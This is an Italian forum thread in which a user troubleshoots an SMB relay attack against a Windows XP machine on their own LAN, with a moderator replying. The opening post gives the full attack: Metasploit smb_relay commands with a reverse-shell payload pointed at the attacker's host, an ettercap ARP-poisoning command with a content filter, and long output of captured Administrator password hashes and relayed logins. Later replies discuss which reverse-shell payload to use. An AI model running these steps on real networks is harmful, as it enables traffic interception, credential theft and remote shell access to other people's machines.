Results 1 to 9 of 9

Thread: [problema] Windows SMB_Relay_Exploit

  1. #1
    Just burned his ISO
    Join Date
    Oct 2009
    Posts
    6

    Default [problema] Windows SMB_Relay_Exploit

    Salve e complimenti per il forum ci voleva propio in italiano.
    Allora io dopo che mi sono documentato molto su questo tipo di attacco ho voluto mettere in atto su' cio' che ho appreso (sulla mia rete lan), e devo dire la verita' non ho trovato problemi grandi...
    lacio etterfilter :etterfilter smb.filtr -o smb.ef
    e mi creo il filtro smb.ef

    Dopo che ho fatto tutto il procedimento ho lanciato la framework metasploit in questo modo :
    Code:
    msf > use windows/smb/smb_relay
    msf exploit(smb_relay) > set PAYLOAD windows/shell_reverse_tcp
    PAYLOAD => windows/shell_reverse_tcp
    msf exploit(smb_relay) > set LHOST 192.168.1.101
    LHOST => 192.168.1.101
    msf exploit(smb_relay) > exploit
    e mi risponde cosi' :
    Code:
    [*] Started reverse handler[*] Server started.
    poi lancio ettercap :
    Code:
    ettercap -T -q -F smb.ef -M ARP /192.168.1.219/ // -P autoadd -i wlan0
    che mi risponde cosi':
    Code:
    ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
    
    Content filters loaded from smb.ef...
    Listening on wlan0... (Ethernet)
    
     wlan0 ->	00:21:5C:5B:78:3D     192.168.1.101     255.255.255.0
    
    Privileges dropped to UID 0 GID 0...
    
      28 plugins
      39 protocol dissectors
      53 ports monitored
    7587 mac vendor fingerprint
    1698 tcp OS fingerprint
    2183 known services
    
    Randomizing 255 hosts for scanning...
    Scanning the whole netmask for 255 hosts...
    * |==================================================>| 100.00 %
    
    2 hosts added to the hosts list...
    
    ARP poisoning victims:
    
     GROUP 1 : 192.168.1.219 00:21:00:A7:73:2C
    
     GROUP 2 : ANY (all the hosts in the list)
    Starting Unified sniffing...
    
    
    Text only Interface activated...
    Hit 'h' for inline help
    
    Activating autoadd plugin...
    
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    SMB : 192.168.1.219:445 -> USER: Administrator  HASH: Administrator:"":"":314BB7C384593DD443F91FEAF2326D43AF1A88BDA1960CD3:4DA5D30CAAD1D1E4BBCEC8B6693C400B5E1D9473424237D4:FD43469EB47B7334 DOMAIN: ROSA-05AA89B2DC
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    zapped Accept-Encoding!
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    SMB : 192.168.1.219:445 -> USER: Administrator  HASH: Administrator:"":"":333A14003623CB05F891582CC563BFF2E93C97CB73DAA14E:478D5B65AACA953D89FB93B35C8A4584D3A672CD85789227:07E53BAB55E2A30C DOMAIN: ROSA-05AA89B2DC
    zapped Accept-Encoding!
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    SMB : 192.168.1.219:445 -> USER: Administrator  HASH: Administrator:"":"":B61EE890E9CB128759B3811A16AE0E2BD06512E74987045E:F7D041DC3A3EB9DA7F51B73F62302290F7C87DF97CB20906:669576B1CB6139DE DOMAIN: ROSA-05AA89B2DC
    SMB : 192.168.1.219:445 -> USER: Administrator  HASH: Administrator:"":"":767E2FE48A98D3584DE30B198B245376C9B72C77AD71DA80:1B832A99DA71AC94DBE2B6A36B8658F422CF0723B08B124B:80EE4F0BBE043EB2 DOMAIN: ROSA-05AA89B2DC
    
    
    mentre nella shell dove ho lanciato la metasploit mi risponde in questo altro modo:
    *] Received 192.168.1.219:1083 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Sending Access Denied to 192.168.1.219:1083 \[*] Received 192.168.1.219:1083 ROSA-05AA89B2DC\Administrator LMHASH:51fc5aa9fa03b225c554178c8e3d26165a4d84307fea1452 NTHASH:1f8d89cf41613d62a722874989f8071df2ee1436e73db7aa OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Authenticating to 192.168.1.219 as ROSA-05AA89B2DC\Administrator...[*] AUTHENTICATED as ROSA-05AA89B2DC\Administrator...
     
    [-] FAILED! The remote host has only provided us with Guest privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain will only provide Guest privileges to network logins by default.
     [*] Sending Access Denied to 192.168.1.219:1083 ROSA-05AA89B2DC\Administrator[*] Received 192.168.1.219:1088 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Sending Access Denied to 192.168.1.219:1088 \[*] Received 192.168.1.219:1088 ROSA-05AA89B2DC\Administrator LMHASH:314bb7c384593dd443f91feaf2326d43af1a88bda1960cd3 NTHASH:4da5d30caad1d1e4bbcec8b6693c400b5e1d9473424237d4 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Authenticating to 192.168.1.219 as ROSA-05AA89B2DC\Administrator...[*] AUTHENTICATED as ROSA-05AA89B2DC\Administrator...
     
    [-] FAILED! The remote host has only provided us with Guest privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain will only provide Guest privileges to network logins by default.
     [*] Sending Access Denied to 192.168.1.219:1088 ROSA-05AA89B2DC\Administrator[*] Received 192.168.1.219:1090 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Sending Access Denied to 192.168.1.219:1090 \[*] Received 192.168.1.219:1090 ROSA-05AA89B2DC\Administrator LMHASH:333a14003623cb05f891582cc563bff2e93c97cb73daa14e NTHASH:478d5b65aaca953d89fb93b35c8a4584d3a672cd85789227 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Authenticating to 192.168.1.219 as ROSA-05AA89B2DC\Administrator...[*] AUTHENTICATED as ROSA-05AA89B2DC\Administrator...
     
    [-] FAILED! The remote host has only provided us with Guest privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain will only provide Guest privileges to network logins by default.
     [*] Sending Access Denied to 192.168.1.219:1090 ROSA-05AA89B2DC\Administrator[*] Received 192.168.1.219:1094 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Sending Access Denied to 192.168.1.219:1094 \[*] Received 192.168.1.219:1094 ROSA-05AA89B2DC\Administrator LMHASH:69eef1310ae7f64ffd17c6cd0caaffa57fcf27a367bfb8c2 NTHASH:400902aab37704d33435c211d85a4dff5bf9a3056bf6d709 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Authenticating to 192.168.1.219 as ROSA-05AA89B2DC\Administrator...[*] AUTHENTICATED as ROSA-05AA89B2DC\Administrator...[*] Sending Access Denied to 192.168.1.219:1101 ROSA-05AA89B2DC\Administrator[*] Received 192.168.1.219:1105 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Sending Access Denied to 192.168.1.219:1105 \[*] Received 192.168.1.219:1105 ROSA-05AA89B2DC\Administrator LMHASH:767e2fe48a98d3584de30b198b245376c9b72c77ad71da80 NTHASH:1b832a99da71ac94dbe2b6a36b8658f422cf0723b08b124b OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Authenticating to 192.168.1.219 as ROSA-05AA89B2DC\Administrator...[*] AUTHENTICATED as ROSA-05AA89B2DC\Administrator...
     
    [-] FAILED! The remote host has only provided us with Guest privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain will only provide Guest privileges to network logins by default.
     [*] Sending Access Denied to 192.168.1.219:1105 ROSA-05AA89B2DC\Administrator[*] Received 192.168.1.219:1107 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Sending Access Denied to 192.168.1.219:1107 \[*] Received 192.168.1.219:1107 ROSA-05AA89B2DC\Administrator LMHASH:98c0c5fbfb87fbc3adb95b2db6578a4445e3345fc51f587c NTHASH:53f951431ed067d70f98715c319c186756a774e23f01b989 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Authenticating to 192.168.1.219 as ROSA-05AA89B2DC\Administrator...[*] AUTHENTICATED as ROSA-05AA89B2DC\Administrator...
     
    [-] FAILED! The remote host has only provided us with Guest privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain will only provide Guest privileges to network logins by default.
     [*] Sending Access Denied to 192.168.1.219:1107 ROSA-05AA89B2DC\Administrator[*] Received 192.168.1.219:1109 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Sending Access Denied to 192.168.1.219:1109 \[*] Received 192.168.1.219:1109 ROSA-05AA89B2DC\Administrator LMHASH:3f054f5f7de50f747787772ef1ff004d726ea4b233e2014b NTHASH:8a5c477a0e529d542b4aa2b6eadf4a3887928bb03804ef9d OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Authenticating to 192.168.1.219 as ROSA-05AA89B2DC\Administrator...[*] AUTHENTICATED as ROSA-05AA89B2DC\Administrator...
     .
    praticamente dice che L'host remoto ha fornito soltanto noi con i privilegi del cliente. Si prega di assicurarsi che il nome utente e la password corretti sono stati forniti. I sistemi Windows XP che non fanno parte di un dominio solo i privilegi di account di accesso del cliente alla rete per impostazione predefinita.
    cosa significa? come devo risolvere per far avvenire l'attacco completo .
    GRAZIE A TUTTI ...



    .

  2. #2
    Moderator
    Join Date
    Aug 2007
    Posts
    1,053

    Default

    ancora una volta, leggiti il rergolamento, hai aperto 2 post per la stessa domanda - quando devi postare del codice usa i tag CODE

  3. #3
    Just burned his ISO
    Join Date
    Oct 2009
    Posts
    6

    Default

    scusa brigante allora mi sai dire a che dovuto questo errore:
    Code:
    [-] FAILED! The remote host has only provided us with Guest privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain will only provide Guest privileges to network logins by
    GRAZIE

  4. #4
    Moderator
    Join Date
    Aug 2007
    Posts
    1,053

    Default

    basta tradurre, controlla se il payload è quello giusto

    magari leggi anche il pdf pubblicato in pool.backtrack.it nell' apposita sezione.

  5. #5
    Just burned his ISO
    Join Date
    Oct 2009
    Posts
    6

    Default

    PAYLOAD che ho usato e' stato questo set PAYLOAD windows/shell_reverse_tcp , l'ho configurato ma non so' come mai mi da questo errore dice che :host remoto ha fornito soltanto noi con i privilegi del cliente. Si prega di assicurarsi che il nome utente e la password corretti sono stati forniti
    Quello che ho potuto capire forse l'atro mio pc(dove ho compito l'attacco ) e patchato a questo tipo di attacco ,pero' io devo capire perche', sarei grado a tutti di aiutarmi a capire questo errore, grazie..
    Bello il pdf con la spiegazione ben fatto e moto chiaro...

  6. #6
    Moderator
    Join Date
    Aug 2007
    Posts
    1,053

    Default

    infatti io t' ho detto di leggere il pdf perché c'é descritto che :

    Code:
    windows/shell/reverse_tcp
    e

    Code:
    windows/shell_reverse_tcp
    sono due payload diversi, che vanno scelti secondo il grado di patch applicate al sistema vittima.

  7. #7
    Just burned his ISO
    Join Date
    Oct 2009
    Posts
    6

    Default

    niente ho provato anche con :
    Code:
    windows/shell/reverse_tcp
    mi da' sempre il solito errore
    Scusa per questo tipo di attacco, il pc della vittima deve avere della cartelle condivise oppure no....
    GRAZIE

  8. #8
    Moderator
    Join Date
    Aug 2007
    Posts
    1,053

    Default

    Scusa per questo tipo di attacco, il pc della vittima deve avere della cartelle condivise oppure no....
    queste sono cose che devi sapere tu, prima ancora della scelta dell' exploit.

  9. #9
    Just burned his ISO
    Join Date
    Oct 2009
    Posts
    6

    Default

    cosa significa ,chiedo a voi perche' siete piu' esperti ,perche' io non ho creato nessuna condivisione sul pc che ho attaccato....e chiedevo a voi essendo che questo metasploit sfrutta la condivisione non e che e propio questo che mi provoca questo errore ,o mi sbaglio..

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •